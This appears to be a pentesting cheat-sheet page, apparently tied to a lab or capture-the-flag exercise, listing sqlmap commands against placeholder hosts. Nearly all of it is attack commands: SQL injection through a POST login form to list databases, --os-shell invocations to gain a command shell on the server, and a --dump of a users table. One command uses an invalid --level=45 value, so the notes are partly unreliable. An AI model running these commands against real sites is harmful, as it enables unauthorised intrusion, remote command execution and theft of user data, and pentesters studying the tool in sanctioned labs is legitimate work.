SQLMap

Probe to find the Front-End DB

sqlmap -u "http://xyz.com/index.php" --data "username=test&password=test&submit=Submit" --method=POST --level=3 --dbms=mysql --dbs 

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp   ..Answer!

Discover OS

sqlmap -u http://xyz.com/ --data="username=test&password=test&debug=false"
sqlmap -u http://xyz.com/ --data="username=test&password=test&debug=false" --level=45
sqlmap -u http://xyz.com --data="username=test&password=test&debug=false" --method POST --os-shell
sqlmap -u http://xyz.com --data="username=test&password=test&submit=Submit" --method POST --os-shell

Favorites

sqlmap -u http://$IP/login/php --data="username=test&passwd=test&submit=Submit" --method POST --dbs --batch
sqlmap -u http://$IP/login.php --data="username=test&passwd=test&submit=Submit" --method POST --os-shell

Attempt

sqlmap -u http://$IP/staff_search.php?search=bob --dump -D website -T users

PreviousSQL Injections (sqli)NextWAF

Last updated 1 year ago